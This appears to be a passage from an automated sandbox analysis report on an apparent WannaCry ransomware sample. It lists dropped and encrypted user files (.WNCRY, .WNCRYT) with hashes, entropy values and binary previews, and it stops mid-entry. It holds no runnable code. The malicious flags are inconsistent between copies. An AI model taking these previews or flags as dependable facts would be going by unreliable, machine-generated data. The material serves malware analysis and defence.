                                SHA-256:87EA2C57DF6685C6F9FFAC91018B77FC44F79A1130C8FBD690C1890D942228AF
                                SHA-512:A58554B2646B859163E5B9402A3F61E3005421B541604698D00D796D41F6A7FF5C75FA5499951A9B1E926C7E072E82F5F9247B9B37C05C94DD69BB27F52A59BD
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....y..8.7.A..,....:O`.......S_3o..k...f..k.../.R{.w l...t5S._..`........C.c.|.=.w'..<E.C~.....y33o.W.B...j<..lt...G........T....aS...W..E.....*.......Y2.f.[..t...|S..J.L..`.......Z~.A".).9...joq....7\......W.M.'O......c.8j.......u........4[<B..f.............2ReO.a7...c.q......B..K..3..7..F..y..{*.6i... ..mG.. .f....0^B..X....g#j.....3.9G..a....n.uQ3tO...e.....3.ed..!C.{......Os}...ca%....;.L$..-Of.`n4.Fp...........Yg4.-G...T|R..4'MX..0.fJu.....d..L....".EI.|..-..-...].bg.}....)-.g.9S.R.>BE.wz..28..t."X.....=...Z...?._._...`.U..R.s..qC.-........W...F|.m..rCv.?..%]s..{.;.,q....2..O.~.5.r..7..:T.W..I.|..>...(......eL.Af..K.?|%PU`6.]}]'......m..*Q...x.....5..;W..*..p.k.[...f......MQ:ANc!.%....&.C.-...M..@..Y#.F...l.(.#X......fw.....i.l.[Y.\..-....s.Xr..8......?....s..S.Ux..+..`.).. ?gFQ.$..N..49".L..m....l....&...%.sh|s5..yn.o...Z....'U...\.rc..(Se..me.".w...\z.@...{..<.J..Z.dt.?.........-Hf...-.k^.h..Y.h...z:...7.l...h.......

                                C:\Users\user\Desktop\EEGWXUHVUG\KLIZUSIQEN.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845997200646745
                                Encrypted:false
                                SSDEEP:24:bkddBWKj7YxrKatpYwLY9xeELzaPoJAUiZcSaoL7dU2yReTUHow3xeBwBYIA:bkMKv6u6pYsKL2PqZinLI4TUIw3xe8Yp
                                MD5:1F775F4A8934A7D95D3BDC73F7C437B7
                                SHA1:1307B2ECF1CE5CAF273604A71D514CCE2436A170
                                SHA-256:87EA2C57DF6685C6F9FFAC91018B77FC44F79A1130C8FBD690C1890D942228AF
                                SHA-512:A58554B2646B859163E5B9402A3F61E3005421B541604698D00D796D41F6A7FF5C75FA5499951A9B1E926C7E072E82F5F9247B9B37C05C94DD69BB27F52A59BD
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....y..8.7.A..,....:O`.......S_3o..k...f..k.../.R{.w l...t5S._..`........C.c.|.=.w'..<E.C~.....y33o.W.B...j<..lt...G........T....aS...W..E.....*.......Y2.f.[..t...|S..J.L..`.......Z~.A".).9...joq....7\......W.M.'O......c.8j.......u........4[<B..f.............2ReO.a7...c.q......B..K..3..7..F..y..{*.6i... ..mG.. .f....0^B..X....g#j.....3.9G..a....n.uQ3tO...e.....3.ed..!C.{......Os}...ca%....;.L$..-Of.`n4.Fp...........Yg4.-G...T|R..4'MX..0.fJu.....d..L....".EI.|..-..-...].bg.}....)-.g.9S.R.>BE.wz..28..t."X.....=...Z...?._._...`.U..R.s..qC.-........W...F|.m..rCv.?..%]s..{.;.,q....2..O.~.5.r..7..:T.W..I.|..>...(......eL.Af..K.?|%PU`6.]}]'......m..*Q...x.....5..;W..*..p.k.[...f......MQ:ANc!.%....&.C.-...M..@..Y#.F...l.(.#X......fw.....i.l.[Y.\..-....s.Xr..8......?....s..S.Ux..+..`.).. ?gFQ.$..N..49".L..m....l....&...%.sh|s5..yn.o...Z....'U...\.rc..(Se..me.".w...\z.@...{..<.J..Z.dt.?.........-Hf...-.k^.h..Y.h...z:...7.l...h.......

                                C:\Users\user\Desktop\EEGWXUHVUG\NYMMPCEIMA.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.828589881678447
                                Encrypted:false
                                SSDEEP:24:UtSNpPyyo4FyktuOH7LdoX/53LlWyJiE4WpRnmUTJ5p15F4R:4SNp6yomfc0dox3Ll4kBmUDM
                                MD5:C0159297ADFF3043A6F4851207B6E825
                                SHA1:520D2F9E16BD5506715DE1991B17147462C437F9
                                SHA-256:A673CE8DFA0E147EAB0CE46E2AA80AEBBBDD13F76A6AD2B3D9D2E0AF647BEC0D
                                SHA-512:E0E6420EDAA066A803FD89654134664B1CD586F1101F8AAF8D0477EBA30AC9E7D71DAAAE7A1C94EC53E62364A689E85BBB9EF526A2E768DE50CD3C5530F3547B
                                Malicious:true
                                Reputation:unknown
                                Preview:H@.3...(.|ZA..T.....=..c...t..}.Z....QLT...CP/.eN..`.".S.....Z...?....^..Q.O......C.+..Y:/.2...../=i.2.B..x.I...l]....K7....s.j..h..p.k...C..0........%....c....;*.&..(..5...3../z...P^.M.b.r.9i.....1..P..JAR$.....{2..&n.@y/Q.'..&a.}....I....v........=..H`D..q.z{....?Hs3... .2.-.....9.2...2.y.....#...a...6]i......~......\.y.~...'..h.:..oE.9....C.-Y..#..n.S..G.0SG.......=..e.....-*Y*.....t..)o.2...HyL..,..;....d.|...$i..Q...3..[.z^...;..@.). B.$.B"..A.!9..;..u.N..._o..)....zZ.i((.{.:T.#..wk.eNgO3`f.....s..]./|{cS....%..C.J..9\..a..!...d..4... .l+.0E.je.$.bg......m_.."Xl...Q..."....(~Q..!...L4@..k..j.V].....&.i.Lc...8F.U..bt...0...~..6.5.....X....\...}}]..:Pj=}...7c4..Zj...u...F<.O.nw.:...!l...P.K...q[.D..,...8.hC9zQ].qiS^...=..2.g.Y.}p...{%.....]...S]6.w>)..d....l...^.w.4.......|..........IE...c.9.V..L.".......f>...*..]H..a...^.&...3W.@....f..y.7..'....b..^L...;..._w>DS...'.M..0....1.....Q.!f..g.S.#_...d_... J........m.@t...E..t.(.w.r.e)........D

                                C:\Users\user\Desktop\EEGWXUHVUG\NYMMPCEIMA.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861849899411367
                                Encrypted:false
                                SSDEEP:24:bkb+sC0MvgZzIovS38OQ2xUIovWnnGK/J3dIKJg9JDfWlBvzG4YHYMNvPd:bk6x0MvGzbvSMO9ovf2J3w9Bf0Bv1g9F
                                MD5:F1A799705C6CDD78F840842DF538D1DA
                                SHA1:44EAC4B053F4E2589409ADE5783CED7001B282A3
                                SHA-256:57295381D9ECC86FACFA39E3D6231DA868E60254BBC9A525E8A63ADA0FF8B548
                                SHA-512:31C53FC2E00C3E8C1840FE3132E228C1DF234D84053EB796CC0D3FD0A609D5AD9B4ECE2136B4DA88CF780B78F60E7593A355CBF88BAEDBF8209569CB76D37B32
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....C].....T...+d.SPz. e.C.8..M.a......x.i.1g..0..Q@u.j.JLl..f..d8...&.-c.Hw@2T.O.D..m....[..t.....lbL.3.a..............E.G.Z.R....7....uz.SK.b..>e7..S{.........a.gh.zV...f..k.....4y.M..v..Y\^...Q..$b/..$p^z.OK.E<....h{...../....|y){XuB~1.9F 6...+................@+...?.....m.G.:...U..(.\b%...S.e.M.y.n.........[..g...WP.e...EF.....8-..%..:...D>.?...9...I..@..b.'.[l..<.....&..!...v../M{..Z~..7...y.v..ly...MJ. &z^........}R..9y.K...}]W........H....o6.Pw...BT.....w..y.f...;9.:......(..G.|D.z....:,w_...P.....%.Nq..P.&-......e^../}.I8H..l...L.....K.8.f..P0F......Ag*J.=.ic..x...S7.N52o.c-....=.[Bc...s.....g*.Yx*.e..W.r...4....'.n....g..13>p3Nv......f...s.H.X.`..d...!...(z.e...W..o....-..i|..|..l.^...a....*;.L9|....}.V.6..._......:(....b.z..C............`.a.0..f...^..;i$.|.4.2&.k.......-.H.:/..+.TY+....'jw..U..... ......?{#.%E+S.0..a.1-...{.6J.gUL...0....,...,.(...@...ZE..._. _L...q.[~1zxt..dX....s.N..f...Se].7..j.(..DT.b.....O._...l.K.@..z.

                                C:\Users\user\Desktop\EEGWXUHVUG\NYMMPCEIMA.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861849899411367
                                Encrypted:false
                                SSDEEP:24:bkb+sC0MvgZzIovS38OQ2xUIovWnnGK/J3dIKJg9JDfWlBvzG4YHYMNvPd:bk6x0MvGzbvSMO9ovf2J3w9Bf0Bv1g9F
                                MD5:F1A799705C6CDD78F840842DF538D1DA
                                SHA1:44EAC4B053F4E2589409ADE5783CED7001B282A3
                                SHA-256:57295381D9ECC86FACFA39E3D6231DA868E60254BBC9A525E8A63ADA0FF8B548
                                SHA-512:31C53FC2E00C3E8C1840FE3132E228C1DF234D84053EB796CC0D3FD0A609D5AD9B4ECE2136B4DA88CF780B78F60E7593A355CBF88BAEDBF8209569CB76D37B32
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....C].....T...+d.SPz. e.C.8..M.a......x.i.1g..0..Q@u.j.JLl..f..d8...&.-c.Hw@2T.O.D..m....[..t.....lbL.3.a..............E.G.Z.R....7....uz.SK.b..>e7..S{.........a.gh.zV...f..k.....4y.M..v..Y\^...Q..$b/..$p^z.OK.E<....h{...../....|y){XuB~1.9F 6...+................@+...?.....m.G.:...U..(.\b%...S.e.M.y.n.........[..g...WP.e...EF.....8-..%..:...D>.?...9...I..@..b.'.[l..<.....&..!...v../M{..Z~..7...y.v..ly...MJ. &z^........}R..9y.K...}]W........H....o6.Pw...BT.....w..y.f...;9.:......(..G.|D.z....:,w_...P.....%.Nq..P.&-......e^../}.I8H..l...L.....K.8.f..P0F......Ag*J.=.ic..x...S7.N52o.c-....=.[Bc...s.....g*.Yx*.e..W.r...4....'.n....g..13>p3Nv......f...s.H.X.`..d...!...(z.e...W..o....-..i|..|..l.^...a....*;.L9|....}.V.6..._......:(....b.z..C............`.a.0..f...^..;i$.|.4.2&.k.......-.H.:/..+.TY+....'jw..U..... ......?{#.%E+S.0..a.1-...{.6J.gUL...0....,...,.(...@...ZE..._. _L...q.[~1zxt..dX....s.N..f...Se].7..j.(..DT.b.....O._...l.K.@..z.

                                C:\Users\user\Desktop\EEGWXUHVUG\ZGGKNSUKOP.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.76407204195986
                                Encrypted:false
                                SSDEEP:24:xTzCQS7Ws7Qesi6+DebxRNtKa6vXIHxU6B6qUzspqBc:hzCQS7Ws0esiRKbnNtKtXIRAzVBc
                                MD5:634F1DD4C6AF029CAB462C1107EB05D9
                                SHA1:15DA13FE2CF6FF9377EF0E30791439B4EFF1F9F7
                                SHA-256:494805B069E5C1D686F4BC7F394C3F809278E3E58AFF3EA9303902DCC1F96BA9
                                SHA-512:FBC602E8B84A04E49A6A88963403DFD42A3C621ED9B8C52AA01A4411FE88C1F47A41B552BF7B16F332B01C87F46D030B511D632EAAA58C37283F83A619B116AE
                                Malicious:false
                                Reputation:unknown
                                Preview:...(%...a...>.]3.:.G.'V(=.|...|K.F.....m.^...a...q.`.V.k....<'..J..0R$.R.0.W<[.....D.=L>.V...|..gbV_lP..t.P..$..2E....#.-.I.0......].}.&....3vl...I6eTx:.N.....J.j.M#.6....p..<...*<.._q....5R.....[.0|.@....T........_..I..XmR...1E.^.:..Y...R".Q.7..$X7.@...U..s..(.. .Md..8#.4.Yq..>+..........N[.r.W.2...cB.....o..7t.b.[....h.v.v4&$.e;.).;R7...C.28>L....j07"....i;..j.M.V.....x....b.*.....^..r..c..G.....`s..0..9...[$.8..o..s=.0>..l.K..l#..b.u...+D.<...6..ON.Lv..>....d..\.......(...,/A.rGP..4r7...5..~o..|..v...z]...6..S...a..1E...0...wD...u.PAZ>P.j.^wk.D.X#..fA.&...Xh.~.x...a......Nn.\L.Z.=..;*=P.t.R....o#e....h.#d...&..N#...o..x.2-.c..r"s.Z..h.M.<.n.r......@..h.I.....n...|z..1.zL6..lY.0.N.}.l..b...e..+.[.C..V.4............"..g\cg.}.....9.,.D+.q..S!..Z.....'9.V..xL*:..4...kr...1.c.....8I..p`..NIE:)G.z...u..........Dz..]xc.;..M66.J.....Q.~.G...}r;a;..5..m.....m.Q*.....n..n...|/X...:%.;j}0.USzj...6.q....8.Y|.8L...l..u..Cs.....`*...0.^b......!.

                                C:\Users\user\Desktop\EEGWXUHVUG\ZGGKNSUKOP.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.824938057904074
                                Encrypted:false
                                SSDEEP:24:bklnkAsU1j9Gbai71jfkGWLJCHclRyv/oD0r845nB5/kOcJjhImc39g00Flb:bkVk41BkdcGWLJC8qv/Xr84h/ZVD+00T
                                MD5:4249B0518FFCECE2B06C3635E45CC0C6
                                SHA1:621E0AD5B86017C732D59EFE452575957B40DCBC
                                SHA-256:4D56FA0D0D92D0C9D188CF88D305C8CA9A950E840F6CBA7F3AE29A70A95C9981
                                SHA-512:44E1C3887ECAC7783B107531A00803F181C2F246F455766FC4A9467D9D81BBE2FD38F07F8389897FF41D9E63E6C820DAFA72FB2232BF41CB2837823AC4AA3283
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$.l.....Gm.......1..P.~x..^Rl..LP0/Ef..f...UJ..g.........v.Z....AS..6..f"..F....2...XNQ......j.^..?..iD.8;.....'d...6.>_A..M...R&[*...8..S.$.....;..zC.PE.m.M....u[~........A........{..\..?.aD....;..a...?..ph6..'....m.}eO.......J.........._.Z..............P1t.s.P`.0.m..g..a6.M..36.k...g..t.....V.%.?aO..YhZ.}+F..Sj.&.1S....,..OoT..fX.,)N...$..{M..0.T..F.P...o....A....i.~.X.X.....Y..H$...0....H.mVGf>..1.8;'.F..l.h/.....p.z.R..$.9..27..i.i.}...l..TAd...u..6....*..:...Ke`.u}F..d.....l.g...Th?y.s..4||..Bw.......v.v.m..A1.M.9pZ...FB.{..d.>.,R....8.+_|;.5v.I...~`.l.....(1.....wMM,...x<.V.....\.....[.._.k.p.2S.*8.(...-I....@..].m.....>.6...G...p~m...O.|...B.S..vS..z...x....h...+..Y.^..M.x..S..[6...d....e..[a..)..L....T.oE%.?.*8.+t....Y.o......Q....,.....;0.g.j..3.X.....s=,..(ba........=Z..Z.u-.#7}K....."...Sd.".....=.s..A.x/,7..Kq=.../x....3...@..S.o.2X./5..Oj....2....T..)T....C.um.s.....h)T...f..I#..8...t.&..H.n..Yt..n'B.!1.9jv.o.>.

                                C:\Users\user\Desktop\EEGWXUHVUG\ZGGKNSUKOP.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.824938057904074
                                Encrypted:false
                                SSDEEP:24:bklnkAsU1j9Gbai71jfkGWLJCHclRyv/oD0r845nB5/kOcJjhImc39g00Flb:bkVk41BkdcGWLJC8qv/Xr84h/ZVD+00T
                                MD5:4249B0518FFCECE2B06C3635E45CC0C6
                                SHA1:621E0AD5B86017C732D59EFE452575957B40DCBC
                                SHA-256:4D56FA0D0D92D0C9D188CF88D305C8CA9A950E840F6CBA7F3AE29A70A95C9981
                                SHA-512:44E1C3887ECAC7783B107531A00803F181C2F246F455766FC4A9467D9D81BBE2FD38F07F8389897FF41D9E63E6C820DAFA72FB2232BF41CB2837823AC4AA3283
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$.l.....Gm.......1..P.~x..^Rl..LP0/Ef..f...UJ..g.........v.Z....AS..6..f"..F....2...XNQ......j.^..?..iD.8;.....'d...6.>_A..M...R&[*...8..S.$.....;..zC.PE.m.M....u[~........A........{..\..?.aD....;..a...?..ph6..'....m.}eO.......J.........._.Z..............P1t.s.P`.0.m..g..a6.M..36.k...g..t.....V.%.?aO..YhZ.}+F..Sj.&.1S....,..OoT..fX.,)N...$..{M..0.T..F.P...o....A....i.~.X.X.....Y..H$...0....H.mVGf>..1.8;'.F..l.h/.....p.z.R..$.9..27..i.i.}...l..TAd...u..6....*..:...Ke`.u}F..d.....l.g...Th?y.s..4||..Bw.......v.v.m..A1.M.9pZ...FB.{..d.>.,R....8.+_|;.5v.I...~`.l.....(1.....wMM,...x<.V.....\.....[.._.k.p.2S.*8.(...-I....@..].m.....>.6...G...p~m...O.|...B.S..vS..z...x....h...+..Y.^..M.x..S..[6...d....e..[a..)..L....T.oE%.?.*8.+t....Y.o......Q....,.....;0.g.j..3.X.....s=,..(ba........=Z..Z.u-.#7}K....."...Sd.".....=.s..A.x/,7..Kq=.../x....3...@..S.o.2X./5..Oj....2....T..)T....C.um.s.....h)T...f..I#..8...t.&..H.n..Yt..n'B.!1.9jv.o.>.

                                C:\Users\user\Desktop\EFOYFBOLXA.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.837820223992027
                                Encrypted:false
                                SSDEEP:24:HrHe6lSzLqoGqcUJQtKromIHlvAnUQoRP7V:HywSz3GqcUatOkxAncPR
                                MD5:4E06EE805B6418DBF2619865A82795D5
                                SHA1:84F8B87158C777BB8196152AB3E0AF32E5469A52
                                SHA-256:083EA69930A8A2D96C084D421620137C3CD9E8CE8DCBF563D345203076E93518
                                SHA-512:4FB32607050A78D47EBD85A9CD7B605178EF5EEE0E500159B9080EC737B1431FAFA434D0C181741140291761FFCDE83BE7DFCA1A44B4BC9C1523C48E91C9929C
                                Malicious:false
                                Reputation:unknown
                                Preview:D...].i..5..9.p...]a..2.m...U.[c..{...^Y..Z..L....Z.}......e..8.1..?.....t..'.&...w....M....q.d.6...)Ki+.Q...~Wj...ze.w.v8..if.Q.......m^4pS.=o.:...d.9.#)...bh..^..cC..F.C....M`.+Y...x.paP...#.....<...>...5)&..Z%._.&W..z._P..}..o.o..0..yo..Z..S...9....... .[E.8..\L.k.kp.Pj.}....".2..;rg}.O...x..dt.^>..J.m5.....b|...+.......gy$.s..@$U3U3...:... .'.._y........X..|f.AV|...k....q%.~J.+PO,...z~...4.'........~C...U....!..IW.....a:....'.+e...tq.~~.u.<.HT......o..]......#.}..B.M.j...J......`.S!`..H).].../,.qmI..*(g.u....3OwP7-k4c.2Z.>I.].S..L.....d.......T.g.)..v:.9......*`.i.....7....P.U...pj.@.).....6....v..w.[.V .1I.P..xZNK..H].1...Ia.Q..H.|*+8..? ...:.c-.^....)./...#5X.....1.....Q...~.6.......$CNRl;...........Y;.<...P...j1...jNI..S.....Wj..E.Z.HrO>...M....d..N.p..7pF..r(.^q.=..P...B.....R.......5.m...,......E.s...{.>A.GyM6F.7......J..xq.O.$. c._k..u..Xb'tY..ZP%..Bv`.....Z..n9.....SGkN.t.MJ..)..c.....# .....&....._...Mn.k.....&..".;.&..G...G.|FJ..

                                C:\Users\user\Desktop\EFOYFBOLXA.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83677576965376
                                Encrypted:false
                                SSDEEP:24:bkqbMf4wJTopgGDAb8ZfWX5dlE6qc7ifixNoh4tBPO27SCKLyttg4:bkqbMtTlAJWX5nrCiLG27pKLy3j
                                MD5:02A56183CB70CB85B9DA1A64E43B25AB
                                SHA1:85B4B93ACB753767BB06CA5129C93070960A882E
                                SHA-256:FF673CD1FA71EA96F60DB64A3531FD81166F1FC44514525D8D6358DB82DB9528
                                SHA-512:48A806C1AB634D95A363A223559F078C1FB54E9EF37EC3E71BEEA1D29DD1EC11A3945FBA7ABB665B49A74DE1D52DCB34EB0F3F7FF11A9204801385F282AA3506
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....7..?a..<!....Cj.b...@.-.........SV.(....gm*.....k#s.....=A.4s2..)..f~.~.....o...?.B).#m.sEI.c..0_!...r~...h|..!.h...X..hHC....[.N.c.m..p..MM./...:.?...-......t.Vs2.}~!..E..T...[.......=...^.F!m.=......&\|..(......z..8r?..._.4t2...6U...SbqMY.-F...ds............z.bh..Z.`.vs.G.....'.........t.......B. e$. .....3n,..".f......2Q,a^.....8k4..%.R.FA<.d...6z.%v2.....0-.'VG......(.......vu..+g.P/a.&-.....9ie..dp......._s.i.....<.|V..3)..............[.%R...a..w.@...nCt.....N]....^.2...1...\.$C........&|\Y..9........rnf.\.=...A..a...w.q.9n.iL.+M......h.j:I.iS..?..`.:....6.I..3..cl...O...._..\%.j."..r...vy..[..I..........O^V...#?..'{.......}.M.k.....B8. F.\~R]q..~.........>L..;4.L.nni..=./.n..O.2.......g<.#Y.>.....l....j4.(`H............F.O0.[v=]....5..%.S.....2..h...x*;.......Y.X.s.....6S.a.B....V...o.....h...$....t...f.&...;..B0(% #...>...^q...5._.....L..,.>.$T...48S.a..%.......].w.h..)..{..]..Q;.En....X.......N>!.m.Z.NO..%..4*.K.M.

                                C:\Users\user\Desktop\EFOYFBOLXA.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83677576965376
                                Encrypted:false
                                SSDEEP:24:bkqbMf4wJTopgGDAb8ZfWX5dlE6qc7ifixNoh4tBPO27SCKLyttg4:bkqbMtTlAJWX5nrCiLG27pKLy3j
                                MD5:02A56183CB70CB85B9DA1A64E43B25AB
                                SHA1:85B4B93ACB753767BB06CA5129C93070960A882E
                                SHA-256:FF673CD1FA71EA96F60DB64A3531FD81166F1FC44514525D8D6358DB82DB9528
                                SHA-512:48A806C1AB634D95A363A223559F078C1FB54E9EF37EC3E71BEEA1D29DD1EC11A3945FBA7ABB665B49A74DE1D52DCB34EB0F3F7FF11A9204801385F282AA3506
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....7..?a..<!....Cj.b...@.-.........SV.(....gm*.....k#s.....=A.4s2..)..f~.~.....o...?.B).#m.sEI.c..0_!...r~...h|..!.h...X..hHC....[.N.c.m..p..MM./...:.?...-......t.Vs2.}~!..E..T...[.......=...^.F!m.=......&\|..(......z..8r?..._.4t2...6U...SbqMY.-F...ds............z.bh..Z.`.vs.G.....'.........t.......B. e$. .....3n,..".f......2Q,a^.....8k4..%.R.FA<.d...6z.%v2.....0-.'VG......(.......vu..+g.P/a.&-.....9ie..dp......._s.i.....<.|V..3)..............[.%R...a..w.@...nCt.....N]....^.2...1...\.$C........&|\Y..9........rnf.\.=...A..a...w.q.9n.iL.+M......h.j:I.iS..?..`.:....6.I..3..cl...O...._..\%.j."..r...vy..[..I..........O^V...#?..'{.......}.M.k.....B8. F.\~R]q..~.........>L..;4.L.nni..=./.n..O.2.......g<.#Y.>.....l....j4.(`H............F.O0.[v=]....5..%.S.....2..h...x*;.......Y.X.s.....6S.a.B....V...o.....h...$....t...f.&...;..B0(% #...>...^q...5._.....L..,.>.$T...48S.a..%.......].w.h..)..{..]..Q;.En....X.......N>!.m.Z.NO..%..4*.K.M.

                                C:\Users\user\Desktop\EFOYFBOLXA.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8083849960197
                                Encrypted:false
                                SSDEEP:24:Sxl8NHhKKLPXIdst2D75YRikr5JTdrtHgjTCaUNpCl:SoBK+05YRHrXTDHO2Npa
                                MD5:857A0F426BD07D4B6821AB6518D5676A
                                SHA1:BB5CA9DFACDFF75AB5CDFF0ECD96BB24C395C3EA
                                SHA-256:8D25A9D900AA495F6110BC39CD296F965E7F612BC9C769DBE0D169BD06F94557
                                SHA-512:3920A28AAAE99B91DC1F8AB01004264165CE73A5ED15090D4E26D485EF70B98210E548695E09AAF2CBB6621294DFFC13B164A11C73B272B0BC0E3D00F5058B31
                                Malicious:false
                                Reputation:unknown
                                Preview:.C~...=:U...]b{..y.o,%....I..A..dR..V.z.B.@H.;.J..#......-~.K.s~./...WpT...T.'..1B.C.......m....y.l..Y.2di.m..C.....W.>..b....P>..4 1.q..!...].|.h......e..4}.x....e...G.......~.%.9...........6..q....p.<..Q.4...:.7...e.._..|.k.*jet..X...?..........1 <d.....Gg2..#.>..k4ox]..f...#.;.......U.>WA.U.r.._.U.=8..q./..{.......5.T.?...).7.H..Z.....z.Lv<p96...h.+I....`....o..=%S....`.M@.1O.z..................?...J..2GYq..P3.^.rk.....dB.............I.+../...N.@o~.c.m...,.K..F....@s.pK............o...Q.E.&.9.&.C..h.~..q!z.xz.X.......v..u..u!a.H.;/..f[.=.......3(....F..N.....(....<......o...1..T.6..u.L(5A.....!ow@.....v...e.Xu..m3..,.y.......|W:\.Bv\. PZ....._.}>5R(.........Q...;#..|......%I/..R..{I.t:~..M....wa..Q......2..6..-...h,.Q...(...r......{AN.G..x...p..Cr!-.c'_{jc.....tj.m..G....%..i'.X..U.......2......7.%L5......E....: .....oE9.....,..X.3%.4....H@......z....D...(...9m.dk.....S...!.d.\.3..i.f......212..fx....g.^....!.;...k..VZ^..

                                C:\Users\user\Desktop\EFOYFBOLXA.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.819828650073252
                                Encrypted:false
                                SSDEEP:24:bkYrLQglYGjbgOV7JcV/U+IlI9tqCPiMgU+TI9EmRfOtuK61cEM/f859:bkYrllYOejqC3cTIpf0HEj9
                                MD5:0C1E41871BE663F7E98158A3718F3DA1
                                SHA1:328E3D083128800D308EB47DBC31686C69582FF7
                                SHA-256:2D9AA64E5E3DDB650611E25699188AA371C1BE9BE57E412AAE59CD26EE849234
                                SHA-512:4EB5791CEDCAE97BDAE9CD58B3BA66BC1BEC2922E2B6465CA37A3B3AEAF0C30997F293E32BE2595B0585A1BFBDC384C16AD6537E361546465E09A5CE2A8DF90A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......Bb.....=.KNNq.8.I.o..@....Z.o.jm...&.s)F..$}..>...a9..e..2...|.g.u.Sa.@..t.....QGb.....z.3>..}.c.#...f..eR..x@.....e-...wG........`O.o...+A-.L......:..}/s.z...4.......zC]&o.Q*,.|^:..PO..G.......=D.F......b.....l...x.{...X*O0i'..Y.k.b...............\.d.."9.ft..$Y.e.Hp..:0...+..tg.......J.x..5y._.9...P..F...+Ai"......S...}..<_u.D.,@lygZEZ.....O..X(@H.M.7C....O..C..@....5.Y...}9Y,...*....E`O...O.|E.......BbU...T(..W<F.Q.y1.....Yt6...ss...K....S%..99\.*...*.*.._ ........ky.ib..O?:7^/A-.f^uq.-G 5.}f].?.^0..U...w.=...U ......W...&...d.0.c.c5/Q............R~....cd../a.....w..&d...D.....B.o...R.v..J3#....t.9.R.=.....pAmjsU.O Z.#O.?....U.Z.8..e...E..q{...>..J..."m...V~R9Ga|.....3.e..stt....z.V.Ve..Iv..Z.......|.....\....n5.l}a.)6..OO...b0a.:.*.*J..?..`t....XD..$....vH..}.(.X(..cZ.&7..{....A...%.?..z.|8.!."E'.c`.e4.>....u...$.TJK.I..F.b...p...hY2.iG.0.8.f$.W(....G..]..C.7).J..Y...kD.LeM<2....p....^>.{..aO.....O<8.\P.......ix.G.

                                C:\Users\user\Desktop\EFOYFBOLXA.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.819828650073252
                                Encrypted:false
                                SSDEEP:24:bkYrLQglYGjbgOV7JcV/U+IlI9tqCPiMgU+TI9EmRfOtuK61cEM/f859:bkYrllYOejqC3cTIpf0HEj9
                                MD5:0C1E41871BE663F7E98158A3718F3DA1
                                SHA1:328E3D083128800D308EB47DBC31686C69582FF7
                                SHA-256:2D9AA64E5E3DDB650611E25699188AA371C1BE9BE57E412AAE59CD26EE849234
                                SHA-512:4EB5791CEDCAE97BDAE9CD58B3BA66BC1BEC2922E2B6465CA37A3B3AEAF0C30997F293E32BE2595B0585A1BFBDC384C16AD6537E361546465E09A5CE2A8DF90A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......Bb.....=.KNNq.8.I.o..@....Z.o.jm...&.s)F..$}..>...a9..e..2...|.g.u.Sa.@..t.....QGb.....z.3>..}.c.#...f..eR..x@.....e-...wG........`O.o...+A-.L......:..}/s.z...4.......zC]&o.Q*,.|^:..PO..G.......=D.F......b.....l...x.{...X*O0i'..Y.k.b...............\.d.."9.ft..$Y.e.Hp..:0...+..tg.......J.x..5y._.9...P..F...+Ai"......S...}..<_u.D.,@lygZEZ.....O..X(@H.M.7C....O..C..@....5.Y...}9Y,...*....E`O...O.|E.......BbU...T(..W<F.Q.y1.....Yt6...ss...K....S%..99\.*...*.*.._ ........ky.ib..O?:7^/A-.f^uq.-G 5.}f].?.^0..U...w.=...U ......W...&...d.0.c.c5/Q............R~....cd../a.....w..&d...D.....B.o...R.v..J3#....t.9.R.=.....pAmjsU.O 